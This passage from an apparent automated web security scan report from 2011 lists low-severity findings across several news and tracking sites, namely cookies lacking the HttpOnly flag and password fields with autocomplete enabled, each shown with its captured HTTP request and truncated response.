GET /b/ss/wbrostheatricaldomesticdvd/1/H.15.1/s23239967282861?[AQB]&ndh=1&t=12/4/2011%208%3A31%3A3%204%20300&ns=warnerbros&pageName=Friday%20the%2013th&g=http%3A//www.fridaythe13thmovie.com/&cc=USD&ch=splash&events=event6&c1=fridaythe13th.us&v1=fridaythe13th.us&c3=splash&v3=splash&c14=Data%20Not%20Available&v14=Data%20Not%20Available&c15=Data%20Not%20Available&v15=Data%20Not%20Available&c16=Data%20Not%20Available&v16=Data%20Not%20Available&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1020&bh=950&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: warnerbros.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.fridaythe13thmovie.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_nyhylx7B88x3D=[CS]v4|26E3F9A98514A256-6000018C80238AC6|4DC7F352[CE]; s_vi_tycpx7Bqtax7Dzxxfzx7Bgpx60apgf=[CS]v4|26E3F9DC051D33BE-40000101E0003608|4DC7F3B6[CE]; s_vi_l8dx7Ebox7Ccdo=[CS]v4|26E3F9DC05010F7F-6000010EC0264A83|4DC7F3B6[CE]; s_vi_gydhix7Eenks=[CS]v4|26E408110515A577-600001774000CAA9|4DC81020[CE]; s_vi_nyhylx7B8x3Dx3C=[CS]v4|26E40823051586B2-60000175A008DCBA|4DC81044[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|26E40823051586B2-60000175A008DCBC|4DC81044[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26E49D3B850131F4-60000102002237AC|4DC93A73[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmqljpxxjmx7Euvx7Bxxu=[CS]v4|26E49D3B850131F4-60000102002237AE|4DC93A73[CE]; s_vi_kxxwwupgxxbrbssx7Dx7Evb=[CS]v4|26E49D3B850131F4-60000102002237B0|4DC93A73[CE]; s_vi_wdkkilx7Bdx7Ejhhf=[CS]v4|26E49D3B850131F4-60000102002237B2|4DC93A73[CE]

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 13:34:01 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E5F0E48501121E-4000010D801D1D96[CE]; Expires=Tue, 10 May 2016 13:34:01 GMT; Domain=warnerbros.112.2o7.net; Path=/
Location: http://warnerbros.112.2o7.net/b/ss/wbrostheatricaldomesticdvd/1/H.15.1/s23239967282861?AQB=1&pccr=true&vidn=26E5F0E48501121E-4000010D801D1D96&&ndh=1&t=12/4/2011%208%3A31%3A3%204%20300&ns=warnerbros&pageName=Friday%20the%2013th&g=http%3A//www.fridaythe13thmovie.com/&cc=USD&ch=splash&events=event6&c1=fridaythe13th.us&v1=fridaythe13th.us&c3=splash&v3=splash&c14=Data%20Not%20Available&v14=Data%20Not%20Available&c15=Data%20Not%20Available&v15=Data%20Not%20Available&c16=Data%20Not%20Available&v16=Data%20Not%20Available&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1020&bh=950&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 13:34:01 GMT
Last-Modified: Fri, 13 May 2011 13:34:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www108
Content-Length: 0
Content-Type: text/plain

9.103. http://www.blogged.com/icons/vn_reganl_8165.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blogged.com
Path:   /icons/vn_reganl_8165.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/vn_reganl_8165.gif HTTP/1.1
Host: www.blogged.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-control: no-cache="set-cookie"
Content-Type: image/gif
Date: Thu, 12 May 2011 13:32:04 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: AWSELB=3DA93FAD04A45483995915AD4CF08CA1445071C0EA9F0DDFF61C555A143718278EBD117F37267783CA60DDF5F2F8B397EDAF20F2E67D073EC065FC75253E6362E99305D29A;MAX-AGE=3600
X-Powered-By: PHP/5.2.6
Content-Length: 713
Connection: keep-alive

GIF87aP..........h..f..b..c..d..j..Z..g..d..e..a..p..[..i..j..d........f...;._..q.....q.....o&..O..8..\........s.M............F..+.....D..........e..g............F..L.....<..O.g......@.rV.U    .......`..
...[SNIP]...
9.104. http://www.etracker.de/cnt.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.etracker.de
Path:   /cnt.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cnt.php?v=2.3&java=y&tc=1305206883555&et=86m8Nm&et_ilevel=0&swidth=1920&sheight=1200&siwidth=1020&siheight=950&scookie=1&scolor=16&p=undefined&et_areas=open&et_target=,0,0,0,0&et_se=4&et_pagename=/open/news/item/Google-s-Chrome-OS-machines-arrive-1242072.html&et_url=http%3A//www.h-online.com/open/news/item/Google-s-Chrome-OS-machines-arrive-1242072.html&slang=en-US HTTP/1.1
Host: www.etracker.de
Proxy-Connection: keep-alive
Referer: http://www.h-online.com/open/news/item/Google-s-Chrome-OS-machines-arrive-1242072.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: etcnt_252902=5350ea7e81b332860dbc86227301aa20%2C1303678554%2C1

Response

HTTP/1.1 200 OK
Expires: Wed, 11 Nov 1998 11:11:11 GMT
P3P: CP="NON DSP NID CURa OUR IND UNI"
Set-Cookie: etcnt_65655=5350ea7e81b332860dbc86227301aa20%2C1305207093%2C1; expires=Thu, 09-Jun-2011 13:31:33 GMT; path=/
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Date: Thu, 12 May 2011 13:31:33 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 13:31:33 GMT
Server: Apache
Content-Type: image/gif
Pragma: no-cache

GIF89a.............!.......,...........D..;
9.105. http://www.facebook.com/profile/pic.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /profile/pic.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /profile/pic.php?oid=AAAAAwAgACAAAAAPGpkM39yYlC_-UQcTRgxu115hCphFd69BTobv3zY9xZY7WP-WDuLyWDbPxFawXyrcSw4ffa4vChZeGBdrwOK57vjarYsCwdr9S1EjPNuHQuczIh9EfBu6C5gj_JnGO43L&size=square HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: image/jpeg
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=LF24m; path=/; domain=.facebook.com
X-FB-Server: 10.27.62.105
X-Cnection: close
Date: Thu, 12 May 2011 13:30:51 GMT
Content-Length: 393

GIF89a2.2....................................................................................................!.......,....2.2....`'.di.h..l.~p,.tm.x..|_...$.+....g.    ..1.I.@...u..\{.....-..G.&@...Y.M.
...[SNIP]...
9.106. http://www.greenfieldreporter.com/view/story/0a19804652d4473789a5eda53a1ed37f/US-Investing-Unlucky-Seven/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenfieldreporter.com
Path:   /view/story/0a19804652d4473789a5eda53a1ed37f/US-Investing-Unlucky-Seven/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /view/story/0a19804652d4473789a5eda53a1ed37f/US-Investing-Unlucky-Seven/ HTTP/1.1
Host: www.greenfieldreporter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Set-Cookie: FreakAuth=eada766c7f8a5c964fd833650e2df4eb; expires=Thu, 12-May-2011 15:31:41 GMT; path=/
Content-Type: text/html
Content-Length: 40407

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>7 'unlucky' mon
...[SNIP]...
9.107. http://www.milehighonthecheap.com/wp-content/plugins/anti-captcha/anti-captcha-0.2.js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.milehighonthecheap.com
Path:   /wp-content/plugins/anti-captcha/anti-captcha-0.2.js.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/plugins/anti-captcha/anti-captcha-0.2.js.php?ver=130214d369d555e15e6b1621771809ad HTTP/1.1
Host: www.milehighonthecheap.com
Proxy-Connection: keep-alive
Referer: http://www.milehighonthecheap.com/2011/05/no-foolin-free-cat-friday-adoption-special-in-boulder/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1990 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: anti-captcha-crc=2bb3a2de5725d2724dbe008da57327593dab4987; expires=Thu, 12-May-2011 14:32:38 GMT; path=/
Last-Modified: Thu, 12 May 2011 13:32:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 3327

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e)
...[SNIP]...
9.108. http://www.milehighonthecheap.com/wp-content/themes/atahualpa353/images/favicon/cities.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.milehighonthecheap.com
Path:   /wp-content/themes/atahualpa353/images/favicon/cities.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/themes/atahualpa353/images/favicon/cities.ico HTTP/1.1
Host: www.milehighonthecheap.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anti-captcha-crc=1a4fa4a4438895652eab32279365c62b77fc9add; __utmz=143899945.1305207063.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2032681215-1305207070993; __utma=143899945.1163999256.1305207063.1305207063.1305207063.1; __utmc=143899945; __utmb=143899945.2.10.1305207063

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 13:34:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,Cookie
X-Pingback: http://www.milehighonthecheap.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1305207252+173.193.214.243; path=/
Last-Modified: Thu, 12 May 2011 13:34:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 60966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
9.109. http://www.youtube.com/embed/TVqe8ieqz10  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /embed/TVqe8ieqz10

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/TVqe8ieqz10?rel=0 HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=s1z-YuDnG-Y; PREF=fv=10.2.154

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:28 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: GEO=c0df1fc5fad584dccc67bc540e26ae88cwsAAAAzVVOtwdbzTcvguA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 11186
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>YouTube - Introducing the Chromebook</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflZITYGO.css">


</head>
<body>
<d
...[SNIP]...
9.110. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zdnet.com
Path:   /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 HTTP/1.1
Host: www.zdnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:27:53 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; expires=Fri, 11-May-2012 13:27:53 GMT; path=/; domain=.zdnet.com
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 108541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
9.111. http://www2.warnerbros.com/all/us/omniture/s_code_wbrostheatricaldomesticdvd.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.warnerbros.com
Path:   /all/us/omniture/s_code_wbrostheatricaldomesticdvd.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /all/us/omniture/s_code_wbrostheatricaldomesticdvd.js HTTP/1.1
Host: www2.warnerbros.com
Proxy-Connection: keep-alive
Referer: http://www.fridaythe13thmovie.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:05 GMT
Server: Apache
Set-cookie: WBWTID=173.193.214.243-4DCBE11918E0000209F5816-www2-wwwintl-web08; path=/; expires=Friday, 01-Jan-10 12:00:00 GMT; domain=.warnerbros.com;
Last-Modified: Thu, 01 Oct 2009 17:56:44 GMT
ETag: "74522-64b3-5ed10f00"
Accept-Ranges: bytes
Content-Length: 25779
Content-Type: application/javascript

/* SiteCatalyst code version: H.15.1.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */

var s_account="wbrostheatricaldomesticdvd"
var s=s_gi(s_account)
/****
...[SNIP]...
10. Password field with autocomplete enabled  previous  next
There are 4 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

10.1. http://crenk.com/buy-chromebook/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://crenk.com
Path:   /buy-chromebook/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /buy-chromebook/ HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html;charset=UTF-8
Date: Thu, 12 May 2011 13:28:15 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; path=/
Last-Modified: Thu, 12 May 2011 10:10:43 +0000
Content-Length: 32569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</p>

       <form name="login-form" id="sidebar-login-form" class="standard-form" action="http://crenk.com/wp-login.php" method="post">
           <label>
...[SNIP]...
<br />
           <input type="password" name="pwd" id="sidebar-user-pass" class="input" value="" tabindex="98" /></label>
...[SNIP]...
10.2. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /news/2011/may/12/heder-here-in-this-spp-ppppp/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:49 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
X-LiveStats-Count: False
Content-Type: text/html; charset=utf-8
X-Varnish: 1531074064
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 104622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</p>

       <form action="/comments/post/" method="post" class="submit_form default_form submit_comment_form">
           

                                       <p>
...[SNIP]...
</span><input type="password" name="password" id="id_password" /></label>
...[SNIP]...
10.3. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /news/2011/may/12/heder-here-in-this-spp-ppppp/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:49 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
X-LiveStats-Count: False
Content-Type: text/html; charset=utf-8
X-Varnish: 1531074064
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 104622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<div class="submit_form_alerts_global">
                           <form action="/accounts/login/?next=/news/2011/may/12/heder-here-in-this-spp-ppppp/" method="post" id="loginform1">                    
                               <div class="global_login_container_left">
...[SNIP]...
</label>
                                           
                                           <input id="global_password" class="vPasswordField required" name="password" size="17" value="" maxlength="30" def="" type="password" style="margin-top:12px;"/>
                                           
                                           <span class="global_formtip">
...[SNIP]...
10.4. http://www.pcworld.com/pcworldconnect/comment_registration  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /pcworldconnect/comment_registration

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

POST /pcworldconnect/comment_registration HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
Origin: http://www.pcworld.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26DA3ECF051D0C7D-400001086000024E[CE]; __utma=205278865.1910705707.1303674274.1305051777.1305206882.3; __utmb=205278865; __utmc=205278865; pcw.last_uri=/article/227430/chrome_os_will_likely_include_netflix_support.html; JSESSIONID=41732781CC4F99C762F0377664240A50; fsr.a=1305206922003; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Content-Length: 111

callingurl=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F227430%2Fchrome_os_will_likely_include_netflix_support.html

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A582A284CD97C03D88D1B381CBB00A78; Path=/
Vary: Accept-Encoding
Content-Length: 6223


<div class="userAction radius_5" style="display:none;" id="regCommentFormContainer">
<span class="tail"></span>
